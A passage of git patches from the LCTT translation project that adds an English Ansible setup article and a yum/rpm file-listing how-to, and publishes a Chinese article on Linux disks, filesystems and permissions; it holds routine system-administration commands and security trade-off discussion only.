diff --git a/sources/tech/20180105 Ansible- the Automation Framework That Thinks Like a Sysadmin.md b/sources/tech/20180105 Ansible- the Automation Framework That Thinks Like a Sysadmin.md
new file mode 100644
index 0000000000..8e0a970f7e
--- /dev/null
+++ b/sources/tech/20180105 Ansible- the Automation Framework That Thinks Like a Sysadmin.md
@@ -0,0 +1,200 @@
+Ansible: the Automation Framework That Thinks Like a Sysadmin
+======
+
+I've written about and trained folks on various DevOps tools through the years, and although they're awesome, it's obvious that most of them are designed from the mind of a developer. There's nothing wrong with that, because approaching configuration management programmatically is the whole point. Still, it wasn't until I started playing with Ansible that I felt like it was something a sysadmin quickly would appreciate.
+
+Part of that appreciation comes from the way Ansible communicates with its client computers—namely, via SSH. As sysadmins, you're all very familiar with connecting to computers via SSH, so right from the word "go", you have a better understanding of Ansible than the other alternatives.
+
+With that in mind, I'm planning to write a few articles exploring how to take advantage of Ansible. It's a great system, but when I was first exposed to it, it wasn't clear how to start. It's not that the learning curve is steep. In fact, if anything, the problem was that I didn't really have that much to learn before starting to use Ansible, and that made it confusing. For example, if you don't have to install an agent program (Ansible doesn't have any software installed on the client computers), how do you start?
+
+### Getting to the Starting Line
+
+The reason Ansible was so difficult for me at first is that it's so flexible with how to configure the server/client relationship that I didn't know what I was supposed to do. The truth is that Ansible doesn't really care how you set up the SSH system; it will utilize whatever configuration you have. There are just a couple things to consider:
+
+1. Ansible needs to connect to the client computer via SSH.
+
+2. Once connected, Ansible needs to elevate privilege so it can configure the system, install packages and so on.
+
+Unfortunately, those two considerations really open a can of worms. Connecting to a remote computer and elevating privilege is a scary thing to allow. For some reason, it feels less vulnerable when you simply install an agent on the remote computer and let Chef or Puppet handle privilege escalation. It's not that Ansible is any less secure, but rather, it puts the security decisions in your hands.
+
+Next I'm going to list a bunch of potential configurations, along with the pros and cons of each. This isn't an exhaustive list, but it should get you thinking along the right lines for what will be ideal in your environment. I also should note that I'm not going to mention systems like Vagrant, because although Vagrant is wonderful for building a quick infrastructure for testing and developing, it's so very different from a bunch of servers that the considerations are too dissimilar really to compare.
+
+### Some SSH Scenarios
+
+1) SSHing into a remote computer as root with the password in the Ansible config.
+
+I started with a terrible idea. The "pros" of this setup are that it eliminates the need for privilege escalation, and there are no other user accounts required on the remote server. But, the cost for such convenience isn't worth it. First, most systems won't let you SSH in as root without changing the default configuration. Those default configurations are there because, quite frankly, it's just a bad idea to allow the root user to connect remotely. Second, putting a root password in a plain-text configuration file on the Ansible machine is mortifying. Really, I mentioned this possibility because it is a possibility, but it's one that should be avoided. Remember, Ansible allows you to configure the connection yourself, and it will let you do really dumb things. Please don't.
+
+2) SSHing into a remote computer as a regular user, using a password stored in the Ansible config.
+
+An advantage of this scenario is that it doesn't require much configuration of the clients. Most users are able to SSH in by default, so Ansible should be able to use credentials and log in fine. I personally dislike the idea of a password being stored in plain text in a configuration file, but at least it isn't the root password. If you use this method, be sure to consider how privilege escalation will take place on the remote server. I know I haven't talked about escalating privilege yet, but if you have a password in the config file, that same password likely will be used to gain sudo access. So with one slip, you've compromised not only the remote user's account, but also potentially the entire system.
+
+3) SSHing into a remote computer as a regular user, authenticating with a key pair that has an empty passphrase.
+
+This eliminates storing passwords in a configuration file, at least for the logging in part of the process. Key pairs without passphrases aren't ideal, but it's something I often do in an environment like my house. On my internal network, I typically use a key pair without a passphrase to automate many things like cron jobs that require authentication. This isn't the most secure option, because a compromised private key means unrestricted access to the remote user's account, but I like it better than a password in a config file.
+
+4) SSHing into a remote computer as a regular user, authenticating with a key pair that is secured by a passphrase.
+
+This is a very secure way of handling remote access, because it requires two different authentication factors: 1) the private key and 2) the passphrase to decrypt it. If you're just running Ansible interactively, this might be the ideal setup. When you run a command, Ansible should prompt you for the private key's passphrase, and then it'll use the key pair to log in to the remote system. Yes, the same could be done by just using a standard password login and not specifying the password in the configuration file, but if you're going to be typing a password on the command line anyway, why not add the layer of protection a key pair offers?
+
+5) SSHing with a passphrase-protected key pair, but using ssh-agent to "unlock" the private key.
+
+This doesn't perfectly answer the question of unattended, automated Ansible commands, but it does make a fairly secure setup convenient as well. The ssh-agent program authenticates the passphrase one time and then uses that authentication to make future connections. When I'm using Ansible, this is what I think I'd like to be doing. If I'm completely honest, I still usually use key pairs without passphrases, but that's typically because I'm working on my home servers, not something prone to attack.
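+
+A minimal sketch of that ssh-agent workflow (assuming the key pair lives at ~/.ssh/id_rsa):
+
+```
+# start an agent for the current shell session
+eval "$(ssh-agent -s)"
+# add the key; you are asked for the passphrase once, then future connections reuse the unlocked key
+ssh-add ~/.ssh/id_rsa
+```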
+
+There are some other considerations to keep in mind when configuring your SSH environment. Perhaps you're able to restrict the Ansible user (which is often your local user name) so it can log in only from a specific IP address. Perhaps your Ansible server can live in a different subnet, behind a strong firewall so its private keys are more difficult to access remotely. Maybe the Ansible server doesn't have an SSH server installed on itself so there's no incoming access at all. Again, one of the strengths of Ansible is that it uses the SSH protocol for communication, and it's a protocol you've all had years to tweak into a system that works best in your environment. I'm not a big fan of proclaiming what the "best practice" is, because in reality, the best practice is to consider your environment and choose the setup that fits your situation the best.
+
+### Privilege Escalation
+
+Once your Ansible server connects to its clients via SSH, it needs to be able to escalate privilege. If you chose option 1 above, you're already root, and this is a moot point. But since no one chose option 1 (right?), you need to consider how a regular user on the client computer gains access. Ansible supports a wide variety of escalation systems, but in Linux, the most common options are sudo and su. As with SSH, there are a few situations to consider, although there are certainly other options.
+
+1) Escalate privilege with su.
+
+For Red Hat/CentOS users, the instinct might be to use su in order to gain system access. By default, those systems configure the root password during install, and to gain privileged access, you need to type it in. The problem with using su is that although it gives you total access to the remote system, it also gives you total access to the remote system. (Yes, that was sarcasm.) Also, the su program doesn't have the ability to authenticate with key pairs, so the password either must be interactively typed or stored in the configuration file. And since it's literally the root password, storing it in the config file should sound like a horrible idea, because it is.
+
+2) Escalate privilege with sudo.
+
+This is how Debian/Ubuntu systems are configured. A user in the correct group has access to sudo a command and execute it with root privileges. Out of the box, this still has the problem of password storage or interactive typing. Since storing the user's password in the configuration file seems a little less horrible, I guess this is a step up from using su, but it still gives complete access to a system if the password is compromised. (After all, typing sudo su - will allow users to become root just as if they had the root password.)
+
+3) Escalate privilege with sudo and configure NOPASSWD in the sudoers file.
+
+Again, in my local environment, this is what I do. It's not perfect, because it gives unrestricted root access to the user account and doesn't require any passwords. But when I do this, and use SSH key pairs without passphrases, it allows me to automate Ansible commands easily. I'll note again, that although it is convenient, it is not a terribly secure idea.
+
+4) Escalate privilege with sudo and configure NOPASSWD on specific executables.
+
+This idea might be the best compromise of security and convenience. Basically, if you know what you plan to do with Ansible, you can give NOPASSWD privilege to the remote user for just those applications it will need to use. It might get a little confusing, since Ansible uses Python for lots of things, but with enough trial and error, you should be able to figure things out. It is more work, but does eliminate some of the glaring security holes.
+
+### Implementing Your Plan
+
+Once you decide how you're going to handle Ansible authentication and privilege escalation, you need to set it up. After you become well versed at Ansible, you might be able to use the tool itself to help "bootstrap" new clients, but at first, it's important to configure clients manually so you know what's happening. It's far better to automate a process you're familiar with than to start with automation from the beginning.
+
+I've written about SSH key pairs in the past, and there are countless articles online for setting it up. The short version, from your Ansible computer, looks something like this:
+
+```
+
+# ssh-keygen
+# ssh-copy-id -i .ssh/id_rsa.pub remoteuser@remote.computer.ip
+# ssh remoteuser@remote.computer.ip
+
+```
+
+If you've chosen to use no passphrase when creating your key pairs, that last step should get you into the remote computer without typing a password or passphrase.
+
+In order to set up privilege escalation in sudo, you'll need to edit the sudoers file. You shouldn't edit the file directly, but rather use:
+
+```
+
+# sudo visudo
+
+```
+
+This will open the sudoers file and allow you to make changes safely (it error-checks when you save, so you don't accidentally lock yourself out with a typo). There are examples in the file, so you should be able to figure out how to assign the exact privileges you want.
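+
+For example, hypothetical sudoers lines implementing options 3 and 4 from the escalation list above might look like this (the user name and command paths are placeholders; adapt them to your environment):
+
+```
+# option 3: unrestricted passwordless sudo for the Ansible login user
+ansibleuser ALL=(ALL) NOPASSWD: ALL
+
+# option 4: passwordless sudo for specific executables only
+ansibleuser ALL=(ALL) NOPASSWD: /usr/bin/yum, /usr/bin/systemctl
+```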
+
+Once it's all configured, you should test it manually before bringing Ansible into the picture. Try SSHing to the remote client, and then try escalating privilege using whatever methods you've chosen. Once you have configured the way you'll connect, it's time to install Ansible.
+
+### Installing Ansible
+
+Since the Ansible program gets installed only on the single computer, it's not a big chore to get going. Red Hat/Ubuntu systems do package installs a bit differently, but neither is difficult.
+
+In Red Hat/CentOS, first enable the EPEL repository:
+
+```
+
+sudo yum install epel-release
+
+```
+
+Then install Ansible:
+
+```
+
+sudo yum install ansible
+
+```
+
+In Ubuntu, first enable the Ansible PPA:
+
+```
+
+sudo apt-add-repository ppa:ansible/ansible
+(press ENTER to access the key and add the repo)
+
+```
+
+Then install Ansible:
+
+```
+
+sudo apt-get update
+sudo apt-get install ansible
+
+```
+
+### Configuring Ansible Hosts File
+
+The Ansible system has no way of knowing which clients you want it to control unless you give it a list of computers. That list is very simple, and it looks something like this:
+
+```
+
+# file /etc/ansible/hosts
+
+[webservers]
+blogserver ansible_host=192.168.1.5
+wikiserver ansible_host=192.168.1.10
+
+[dbservers]
+mysql_1 ansible_host=192.168.1.22
+pgsql_1 ansible_host=192.168.1.23
+
+```
+
+The bracketed sections are specifying groups. Individual hosts can be listed in multiple groups, and Ansible can refer either to individual hosts or groups. This is also the configuration file where things like plain-text passwords would be stored, if that's the sort of setup you've planned. Each line in the configuration file configures a single host, and you can add multiple declarations after the ansible_host statement. Some useful options are:
+
+```
+
+ansible_ssh_pass
+ansible_become
+ansible_become_method
+ansible_become_user
+ansible_become_pass
+
+```
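+
+For instance, a single inventory line combining several of those options might look like this (reusing the blogserver placeholder from the example hosts file above):
+
+```
+[webservers]
+blogserver ansible_host=192.168.1.5 ansible_become=yes ansible_become_method=sudo ansible_become_user=root
+```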
+
+### The Ansible Vault
+
+I also should note that although the setup is more complex, and not something you'll likely do during your first foray into the world of Ansible, the program does offer a way to encrypt passwords in a vault. Once you're familiar with Ansible and you want to put it into production, storing those passwords in an encrypted Ansible vault is ideal. But in the spirit of learning to crawl before you walk, I recommend starting in a non-production environment and using passwordless methods at first.
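+
+When you do get there, the vault side of things is driven by the ansible-vault command; a minimal sketch (the file name is just an example):
+
+```
+# create an encrypted variables file; you will be prompted for a vault password
+ansible-vault create secret_vars.yml
+# view or edit it later
+ansible-vault view secret_vars.yml
+ansible-vault edit secret_vars.yml
+```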
+
+### Testing Your System
+
+Finally, you should test your system to make sure your clients are connecting. The ping test will make sure the Ansible computer can ping each host:
+
+```
+
+ansible -m ping all
+
+```
+
+After running, you should see a message for each defined host showing a ping: pong if the ping was successful. This doesn't actually test authentication, just the network connectivity. Try this to test your authentication:
+
+```
+
+ansible -m shell -a 'uptime' webservers
+
+```
+
+You should see the results of the uptime command for each host in the webservers group.
+
+In a future article, I plan to start digging into Ansible's ability to manage the remote computers. I'll look at various modules and how you can use the ad-hoc mode to accomplish in a few keystrokes what would take a long time to handle individually on the command line. If you didn't get the results you expected from the sample Ansible commands above, take this time to make sure authentication is working. Check out [the Ansible docs][1] for more help if you get stuck.
+
+
+--------------------------------------------------------------------------------
+
+via: http://www.linuxjournal.com/content/ansible-automation-framework-thinks-sysadmin
+
+作者:[Shawn Powers][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.linuxjournal.com/users/shawn-powers
+[1]:http://docs.ansible.com
From f4ac557857f17c6c781003e20265c945934c34e1 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 13:55:03 +0800
Subject: [PATCH 136/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20yum=20find=20out?=
=?UTF-8?q?=20path=20where=20is=20package=20installed=20to=20on=20CentOS/R?=
=?UTF-8?q?HEL?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... is package installed to on CentOS-RHEL.md | 137 ++++++++++++++++++
1 file changed, 137 insertions(+)
create mode 100644 sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
diff --git a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
new file mode 100644
index 0000000000..b0805e08ec
--- /dev/null
+++ b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -0,0 +1,137 @@
+yum find out path where is package installed to on CentOS/RHEL
+======
+
+I have [installed the htop package on a CentOS/RHEL][1] system. I wanted to find out where and at what path the htop package installed all its files. Is there an easy way to tell where a package is installed by yum on CentOS/RHEL?
+
+The [yum command][2] is an interactive, open source, rpm-based package manager for CentOS/RHEL and clones. It can automatically perform the following operations for you:
+
+ 1. Core system file updates
+ 2. Package updates
+ 3. Install new packages
+ 4. Delete old packages
+ 5. Perform queries on the installed and/or available packages
+
+yum is similar to other high level package managers like [apt-get command][3]/[apt command][4].
+
+### yum where is package installed
+
+The syntax is as follows to install the htop package for demo purposes:
+`# yum install htop`
+To list the files installed by a yum package called htop, run the following rpm command:
+```
+# rpm -ql {packageNameHere}
+# rpm -ql htop
+```
+Sample outputs:
+```
+/usr/bin/htop
+/usr/share/doc/htop-2.0.2
+/usr/share/doc/htop-2.0.2/AUTHORS
+/usr/share/doc/htop-2.0.2/COPYING
+/usr/share/doc/htop-2.0.2/ChangeLog
+/usr/share/doc/htop-2.0.2/README
+/usr/share/man/man1/htop.1.gz
+/usr/share/pixmaps/htop.png
+
+```
+
+### How to see the files installed by a yum package using repoquery command
+
+First install yum-utils package using [yum command][2]:
+```
+# yum install yum-utils
+```
+Sample outputs:
+
+```
+Resolving Dependencies
+--> Running transaction check
+---> Package yum-utils.noarch 0:1.1.31-42.el7 will be installed
+--> Processing Dependency: python-kitchen for package: yum-utils-1.1.31-42.el7.noarch
+--> Processing Dependency: libxml2-python for package: yum-utils-1.1.31-42.el7.noarch
+--> Running transaction check
+---> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
+---> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
+--> Finished Dependency Resolution
+
+Dependencies Resolved
+
+=======================================================================================
+ Package Arch Version Repository Size
+=======================================================================================
+Installing:
+ yum-utils noarch 1.1.31-42.el7 rhui-rhel-7-server-rhui-rpms 117 k
+Installing for dependencies:
+ libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
+ python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
+
+Transaction Summary
+=======================================================================================
+Install 1 Package (+2 Dependent packages)
+
+Total download size: 630 k
+Installed size: 3.1 M
+Is this ok [y/d/N]: y
+Downloading packages:
+(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm | 266 kB 00:00:00
+(2/3): libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm | 247 kB 00:00:00
+(3/3): yum-utils-1.1.31-42.el7.noarch.rpm | 117 kB 00:00:00
+---------------------------------------------------------------------------------------
+Total 1.0 MB/s | 630 kB 00:00
+Running transaction check
+Running transaction test
+Transaction test succeeded
+Running transaction
+ Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
+ Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
+ Installing : yum-utils-1.1.31-42.el7.noarch 3/3
+ Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
+ Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
+ Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
+
+Installed:
+ yum-utils.noarch 0:1.1.31-42.el7
+
+Dependency Installed:
+ libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
+
+Complete!
+```
+
+
+### How do I list the contents of an installed package using YUM?
+
+Now run repoquery command as follows:
+`# repoquery --list htop`
+OR
+`# repoquery -l htop`
+Sample outputs:
+[![yum where is package installed][5]][5]
+You can also use the type command or the command command to just find the location of a given binary file, such as httpd or htop:
+`$ type -a httpd
+$ type -a htop
+$ command -V htop`
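+
+Sample output (a sketch; assuming htop is installed at /usr/bin/htop, as the rpm -ql listing above shows, you would see something like):
+
+```
+$ type -a htop
+htop is /usr/bin/htop
+$ command -V htop
+htop is /usr/bin/htop
+```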
+
+### About the Author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][6], [Facebook][7], [Google+][8].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
+
+作者:[][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
+[2]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
+[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
+[4]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
+[5]:https://www.cyberciti.biz/media/new/faq/2018/01/yum-where-is-package-installed.jpg
+[6]:https://twitter.com/nixcraft
+[7]:https://facebook.com/nixcraft
+[8]:https://plus.google.com/+CybercitiBiz
From 19488e521e09dd1dc92abe1768d8df30591603cb Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 16:00:47 +0800
Subject: [PATCH 137/371] PRF&PUB:20171127 Migrating to Linux Disks Files and
Filesystems.md
@qhwdw
---
...ng to Linux Disks Files and Filesystems.md | 113 +++++++++++++++
...ng to Linux Disks Files and Filesystems.md | 135 ------------------
2 files changed, 113 insertions(+), 135 deletions(-)
create mode 100644 published/20171127 Migrating to Linux Disks Files and Filesystems.md
delete mode 100644 translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md
diff --git a/published/20171127 Migrating to Linux Disks Files and Filesystems.md b/published/20171127 Migrating to Linux Disks Files and Filesystems.md
new file mode 100644
index 0000000000..96af33242f
--- /dev/null
+++ b/published/20171127 Migrating to Linux Disks Files and Filesystems.md
@@ -0,0 +1,113 @@
+迁移到 Linux:磁盘、文件、和文件系统
+============================================================
+
+![Migrating to LInux ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/butterflies-807551_1920.jpg?itok=pxTxwvFO "Migrating to LInux ")
+
+> 在你的主要桌面计算机上安装和使用 Linux 将帮你快速熟悉你需要的工具和方法。
+
+这是我们的迁移到 Linux 系列文章的第二篇。如果你错过了第一篇,[你可以在这里找到它][4]。就如之前提到过的,为什么要迁移到 Linux 的有几个原因。你可以在你的工作中为 Linux 开发和使用代码,或者,你可能只是想去尝试一下新事物。
+
+不论是什么原因,在你主要使用的桌面计算机上拥有一个 Linux,将帮助你快速熟悉你需要的工具和方法。在这篇文章中,我将介绍 Linux 的文件、文件系统和磁盘。
+
+### 我的 C:\ 在哪里?
+
+如果你是一个 Mac 用户,Linux 对你来说应该非常熟悉,Mac 使用的文件、文件系统、和磁盘与 Linux 是非常接近的。另一方面,如果你的使用经验主要是 Windows,访问 Linux 下的磁盘可能看上去有点困惑。一般,Windows 给每个磁盘分配一个盘符(像 C:\)。而 Linux 并不是这样。而在你的 Linux 系统中它是一个单一的文件和目录的层次结构。
+
+让我们看一个示例。假设你的计算机使用了一个主硬盘、一个有 `Books` 和 `Videos` 目录的 CD-ROM 、和一个有 `Transfer` 目录的 U 盘,在你的 WIndows 下,你应该看到的是下面的样子:
+
+```
+C:\ [硬盘]
+├ System
+├ System32
+├ Program Files
+├ Program Files (x86)
+└ <更多目录>
+
+D:\ [CD-ROM]
+├ Books
+└ Videos
+
+E:\ [U 盘]
+└ Transfer
+```
+
+而一个典型的 Linux 系统却是这样:
+
+```
+/ (最顶级的目录,称为根目录) [硬盘]
+├ bin
+├ etc
+├ lib
+├ sbin
+├ usr
+├ <更多目录>
+└ media
+ └ <你的用户名>
+ ├ cdrom [CD-ROM]
+ │ ├ Books
+ │ └ Videos
+ └ Kingme_USB [U 盘]
+ └ Transfer
+```
+
+如果你使用一个图形化环境,通常,Linux 中的文件管理器将出现看起来像驱动器的图标的 CD-ROM 和 USB 便携式驱动器,因此,你根本就无需知道介质所在的目录。
+
+### 文件系统
+
+Linux 称这些东西为文件系统。文件系统是在介质(比如,硬盘)上保持跟踪所有的文件和目录的一组结构。如果没有用于存储数据的文件系统,我们所有的信息就会混乱,我们就不知道哪个块属于哪个文件。你可能听到过一些类似 ext4、XFS 和 Btrfs 之类的名字,这些都是 Linux 文件系统。
+
+每种保存有文件和目录的介质都有一个文件系统在上面。不同的介质类型可能使用了为它优化过的特定的文件系统。比如,CD-ROM 使用 ISO9660 或者 UDF 文件系统类型。USB 便携式驱动器一般使用 FAT32,以便于它们可以很容易去与其它计算机系统共享。
+
+Windows 也使用文件系统。不过,我们不会过多的讨论它。例如,当你插入一个 CD-ROM,Windows 将读取 ISO9660 文件系统结构,分配一个盘符给它,然后,在盘符(比如,D:\)下显示文件和目录。当然,如果你深究细节,从技术角度说,Windows 是分配一个盘符给一个文件系统,而不是整个驱动器。
+
+使用同样的例子,Linux 也读取 ISO9660 文件系统结构,但它不分配盘符,它附加文件系统到一个目录(这个过程被称为挂载)。Linux 将随后在所挂载的目录(比如是, `/media/<你的用户名>/cdrom` )下显示 CD-ROM 上的文件和目录。
+
+因此,在 Linux 上回答 “我的 C:\ 在哪里?” 这个问题,答案是,这里没有 C:\,它们工作方式不一样。
+
+### 文件
+
+Windows 将文件和目录(也被称为文件夹)存储在它的文件系统中。但是,Linux 也让你将其它的东西放到文件系统中。这些其它类型的东西是文件系统的原生的对象,并且,它们和普通文件实际上是不同的。除普通文件和目录之外,Linux 还允许你去创建和使用硬链接、符号链接、命名管道、设备节点、和套接字。在这里,我们不展开讨论所有的文件系统对象的类型,但是,这里有几种经常使用到的需要知道。
+
+硬链接用于为文件创建一个或者多个别名。指向磁盘上同样内容的每个别名的名字是不同的。如果在一个文件名下编辑文件,这个改变也同时出现在其它的文件名上。例如,你有一个 `MyResume_2017.doc`,它还有一个被称为 `JaneDoeResume.doc` 的硬链接。(注意,硬链接是从命令行下,使用 `ln` 的命令去创建的)。你可以找到并编辑 `MyResume_2017.doc`,然后,然后找到 `JaneDoeResume.doc`,你发现它保持了跟踪 —— 它包含了你所有的更新。
+
+符号链接有点像 Windows 中的快捷方式。文件系统的入口包含一个到其它文件或者目录的路径。在很多方面,它们的工作方式和硬链接很相似,它们可以创建一个到其它文件的别名。但是,符号链接也可以像文件一样给目录创建一个别名,并且,符号链接可以指向到不同介质上的不同文件系统,而硬链接做不到这些。(注意,你可以使用带 `-s` 选项的 `ln` 命令去创建一个符号链接)
+
+### 权限
+
+ Windows 和 Linux 另一个很大的区别是涉及到文件系统对象(文件、目录、及其它)的权限。Windows 在文件和目录上实现了一套非常复杂的权限。例如,用户和用户组可以有权限去读取、写入、运行、修改等等。用户和用户组可以授权访问除例外以外的目录中的所有内容,也可以不允许访问除例外的目录中的所有内容。
+
+然而,大多数使用 Windows 的人并不会去使用特定的权限;因此,当他们发现在 Linux 上是强制使用一套默认权限时,他们感到非常惊讶!Linux 通过使用 SELinux 或者 AppArmor 可以强制执行一套更复杂的权限。但是,大多数 Linux 安装版都只是使用了内置的默认权限。
+
+在默认的权限中,文件系统中的每个条目都有一套为它的文件所有者、文件所在的组、和其它人的设置的权限。这些权限允许他们:读取、写入和运行。给它们的权限是有层次继承的。首先,它检查这个(登入的)用户是否为该文件所有者和拥有的权限。如果不是,然后检查这个用户是否在文件所在的组中和该组拥有的权限。如果不是,然后它再检查其它人拥有的权限。这里设置了其它人的权限。但是,这里设置的三套权限大多数情况下都会使用其中的一套。
+
+如果你使用命令行,你输入 `ls -l`,你可以看到如下所表示的权限:
+
+```
+rwxrw-r-- 1 stan dndgrp 25 Oct 33rd 25:01 rolldice.sh
+```
+
+最前面的字母,`rwxrw-r--`,展示了权限。在这个例子中,所有者(stan)可以读取、写入和运行这个文件(前面的三个字母,`rwx`);dndgrp 组的成员可以读取和写入这个文件,但是不能运行(第二组的三个字母,`rw-`);其它人仅可以读取这个文件(最后的三个字母,`r--`)。
+
+(注意,在 Windows 中去生成一个可运行的脚本,你生成的文件要有一个特定的扩展名,比如 `.bat`,而在 Linux 中,扩展名在操作系统中没有任何意义。而是需要去设置这个文件可运行的权限)
+
+如果你收到一个 “permission denied” 错误,可能是你尝试运行了一个需要管理员权限的程序或命令,或者尝试访问了一个你的帐户没有权限访问的文件。如果你要做需要管理员权限的事情,你可以切换登入到一个被称为 `root` 的用户帐户,或者在命令行使用一个被称为 `sudo` 的辅助程序,它可以临时允许你以 `root` 权限运行命令。当然,`sudo` 工具也会要求你输入密码,以确保你真的有权限这么做。
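+
+下面是一个简单的对比演示(以基于 Ubuntu 的系统安装软件为例,命令仅作示意):
+
+```
+$ apt install htop        # 普通用户直接运行会得到权限不足的错误
+$ sudo apt install htop   # 通过 sudo 临时以 root 权限运行,需要输入你自己的密码
+```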
+
+### 硬盘文件系统
+
+Windows 主要使用一个被称为 NTFS 的硬盘文件系统。在 Linux 上,你也可以选一个你希望去使用的硬盘文件系统。不同的文件系统类型呈现不同的特性和不同的性能特征。现在主流的原生 Linux 的文件系统是 Ext4。但是,在安装 Linux 的时候,你也有丰富的文件系统类型可供选择,比如,Ext3(Ext4 的前任)、XFS、Btrfs、UBIFS(用于嵌入式系统)等等。如果你不确定要使用哪一个,Ext4 是一个很好的选择。
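+
+如果你想查看现有分区分别使用的是哪种文件系统,可以用下面任意一条命令(两者都是常见发行版自带的工具):
+
+```
+$ lsblk -f   # 列出块设备及其文件系统类型
+$ df -T      # 列出已挂载的文件系统及其类型
+```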
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems
+
+作者:[JOHN BONESIO][a]
+译者:[qhwdw](https://github.com/qhwdw)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/johnbonesio
+[1]:https://www.linux.com/licenses/category/creative-commons-zero
+[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
+[3]:https://www.linux.com/files/images/butterflies-8075511920jpg
+[4]:https://linux.cn/article-9212-1.html
diff --git a/translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md b/translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md
deleted file mode 100644
index 438b27a222..0000000000
--- a/translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md
+++ /dev/null
@@ -1,135 +0,0 @@
-迁移到 Linux:磁盘、文件、和文件系统
-============================================================
-
-![Migrating to LInux ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/butterflies-807551_1920.jpg?itok=pxTxwvFO "Migrating to LInux ")
-在你的主要桌面上安装和使用 Linux 将帮你快速熟悉你需要的工具和方法。[Creative Commons Zero][1]Pixabay
-
-这是我们的迁移到 Linux 系列文章的第二篇。如果你错过了第一篇,[你可以在这里找到它][4]。以前提到过,为什么要迁移到 Linux 的几个原因。你可以在你的工作中为 Linux 开发和使用代码,或者,你可能是正想去尝试一下新事物。
-
-不论是什么原因,拥有一个 Linux 的主桌面,将帮助你快速熟悉你需要的工具和方法。在这篇文章中,我将介绍 Linux 的文件、文件系统和磁盘。
-
-### 我的 C:\ 在哪里?
-
-如果你是一个 Mac 用户,Linux 对你来说应该非常熟悉,Mac 使用的文件、文件系统、和磁盘与 Linux 是非常接近的。另一方面,如果你的使用经验主要是 Windows,访问 Linux 下的磁盘可能看上去有点困惑。一般,Windows 给每个磁盘分配一个盘符(像 C:\)。而 Linux 并不是这样。而在你的 Linux 系统中它是一个单一的文件和目录的层次结构。
-
-让我们看一个示例。假设你的计算机使用了一个主硬盘、一个有 _Books_ 和 _Videos_ 目录的 CD-ROM 、和一个有 _Transfer_ 目录的 U 盘,在你的 WIndows 下,你应该看到的是下面的样子:
-
-```
-C:\ [Hard drive]
-
-├ System
-
-├ System32
-
-├ Program Files
-
-├ Program Files (x86)
-
-└
-
-D:\ [CD-ROM]
-
-├ Books
-
-└ Videos
-
-E:\ [USB thumb drive]
-
-└ Transfer
-```
-
-而一个典型的 Linux 系统却是这样:
-
-```
-/ (the top most directory, called the root directory) [Hard drive]
-
-├ bin
-
-├ etc
-
-├ lib
-
-├ sbin
-
-├ usr
-
-├
-
-└ media
-
- └
-
- ├ cdrom [CD-ROM]
-
- │ ├ Books
-
- │ └ Videos
-
- └ Kingme_USB [USB thumb drive]
-
- └ Transfer
-```
-
-如果你使用一个图形化环境,通常,Linux 中的文件管理器将出现看起来像驱动器的图标的 CD-ROM 和 USB 便携式驱动器,因此,你根本就无需知道介质所在的目录。
-
-### 文件系统
-
-Linux 称这些东西为文件系统。一个文件系统是在介质(比如,硬盘)上保持跟踪所有的文件和目录的一组结构。如果没有文件系统,我们存储在硬盘上的信息就会混乱,我们就不知道哪个块属于哪个文件。你可能听到过一些名字,比如,Ext4、XFS、和 Btrfs。这些都是 Linux 文件系统。
-
